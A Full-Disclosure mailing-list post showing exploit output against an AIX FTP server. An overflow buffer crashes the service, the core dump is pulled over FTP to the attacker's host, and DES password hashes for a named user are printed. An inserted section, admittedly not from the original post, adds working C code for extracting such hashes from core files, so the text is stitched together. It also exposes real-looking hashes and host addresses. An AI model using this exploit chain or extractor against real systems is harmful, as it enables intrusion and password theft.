AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
trigger succeeded!
< 220 yuma FTP server (Version 4.1 Wed Mar 2 15:52:50 CST 2005) ready.
logging in 2nd time...
> USER ftp
< 331 Guest login ok, send ident as password.
> PASS guest
< 230-Last unsuccessful login: Thu Jul 22 09:41:21 MDT 2010 on ssh from docsis1-137
230-Last login: Thu Jul 22 21:12:33 MDT 2010 on ftp from vs2067037.vserver.de
< 230 Guest login ok, access restrictions apply.
changing directory...
> CWD pub
< 250 CWD command successful.
getting core file...
> TYPE I
< 200 Type set to I.
> PORT 85,25,67,37,98,23
< 200 PORT command successful.
> RETR core
< 150 Opening data connection for core (3979727 bytes).
finally extracting DES hashes from core file for user 'jkateley'...
PbdsrHgkIuvp2
9aS4EOARuLSqA
PbdsrHgkIuvp2
logininterval
loginreenable
9aS4EOARuLSqA
logininterval
loginreenable
YIELDLOOPTIME
YIELDLOOPTIME
YIELDLOOPTIME
YIELDLOOPTIME
MALLOCBUCKETS
PREREQUISITES
logininterval
loginreenable
loginreenable
logininterval
done.
[root@vs2067037 kcope]#
Attachment: aix.c (binary data)
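The last step of the transcript, pulling the crypt(3) hashes out of the ~4 MB core file, is the part a reader can reproduce offline. The following is an added example, not part of the original post and not the code in the attached aix.c. It assumes (my assumption, consistent with the false positives "logininterval", "YIELDLOOPTIME" and "MALLOCBUCKETS" in the output above) that the extractor simply reports every run of exactly 13 bytes from the crypt(3) alphabet "./0-9A-Za-z", the length of a traditional DES hash (2 salt + 11 hash characters). On top of that raw scan it adds a heuristic filter and de-duplication that I wrote for this example; the sample "core" buffer is constructed for the demonstration and is not a real AIX core dump.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Traditional DES crypt(3) output: 2 salt chars + 11 hash chars. */
#define DES_HASH_LEN 13

/* Constructed sample "core" image (not a real dump): a passwd-like record
 * surrounded by identifier strings of the kind the post's transcript shows
 * as false positives. Hex escapes are kept in separate literals where the
 * next character would otherwise be read as a hex digit. */
const unsigned char sample_core[] =
    "\x00\x00jkateley\x00PbdsrHgkIuvp2\x00logininterval\x00loginreenable"
    "\x00YIELDLOOPTIME=0\x00" "9aS4EOARuLSqA\x00MALLOCBUCKETS\x00shortone"
    "\x00PbdsrHgkIuvp2";

/* crypt(3) alphabet: "./0-9A-Za-z" */
static int is_crypt_char(unsigned char c) {
    return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
           (c >= '0' && c <= '9') || c == '.' || c == '/';
}

/* Advance *pos to the end of the next maximal run of crypt-alphabet bytes.
 * Sets *start to where the run begins; returns its length (0 when none left). */
static size_t next_run(const unsigned char *buf, size_t len,
                       size_t *pos, size_t *start) {
    size_t i = *pos;
    while (i < len && !is_crypt_char(buf[i])) i++;
    *start = i;
    while (i < len && is_crypt_char(buf[i])) i++;
    *pos = i;
    return i - *start;
}

/* Raw scan: every run of exactly DES_HASH_LEN alphabet bytes, delimited by
 * non-alphabet bytes or the buffer ends. Returns the number of candidates
 * (may exceed max_out; only the first max_out are copied, NUL-terminated). */
size_t scan_des_hashes(const unsigned char *buf, size_t len,
                       char out[][DES_HASH_LEN + 1], size_t max_out) {
    size_t found = 0, pos = 0, start, run;
    while ((run = next_run(buf, len, &pos, &start)) > 0) {
        if (run != DES_HASH_LEN) continue;
        if (found < max_out) {
            memcpy(out[found], buf + start, DES_HASH_LEN);
            out[found][DES_HASH_LEN] = '\0';
        }
        found++;
    }
    return found;
}

/* Heuristic filter (my addition, not from the post): a real crypt(3) hash is
 * close to uniform over 64 symbols, so 13 characters drawn only from the 26
 * lower-case or only from the 26 upper-case letters (roughly (26/64)^13,
 * about 1e-5) are almost certainly an identifier, not a hash. Require at
 * least two of the classes {lower, upper, digit-or-punctuation}. */
int looks_like_des_hash(const char *tok) {
    int lower = 0, upper = 0, other = 0;
    for (const char *p = tok; *p; p++) {
        if (*p >= 'a' && *p <= 'z') lower = 1;
        else if (*p >= 'A' && *p <= 'Z') upper = 1;
        else other = 1;
    }
    return strlen(tok) == DES_HASH_LEN && (lower + upper + other) >= 2;
}

/* Filtered, de-duplicated extraction in order of first appearance. */
size_t extract_des_hashes(const unsigned char *buf, size_t len,
                          char out[][DES_HASH_LEN + 1], size_t max_out) {
    size_t kept = 0, pos = 0, start, run;
    char tok[DES_HASH_LEN + 1];
    while ((run = next_run(buf, len, &pos, &start)) > 0) {
        if (run != DES_HASH_LEN) continue;
        memcpy(tok, buf + start, DES_HASH_LEN);
        tok[DES_HASH_LEN] = '\0';
        if (!looks_like_des_hash(tok)) continue;
        int dup = 0;
        for (size_t j = 0; j < kept; j++)
            if (strcmp(out[j], tok) == 0) { dup = 1; break; }
        if (dup || kept >= max_out) continue;
        strcpy(out[kept++], tok);
    }
    return kept;
}

int main(void) {
    char out[16][DES_HASH_LEN + 1];
    size_t n = extract_des_hashes(sample_core, sizeof(sample_core) - 1, out, 16);
    for (size_t i = 0; i < n; i++) printf("%s\n", out[i]);
    return 0;
}
```

On the constructed buffer the raw scan reports seven 13-character tokens, the same mix of hashes and identifiers the transcript prints; the filtered pass keeps only the two distinct hash-looking tokens. To run it on a real core, read the file into memory (fopen/fread) and pass the buffer and its length to extract_des_hashes; the filter is a heuristic, so a hash whose 13 characters happen to be all lower-case or all upper-case would be dropped, which is why the raw scan is kept alongside it.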
_______________________________________________
Full-Disclosure - We believe in it.
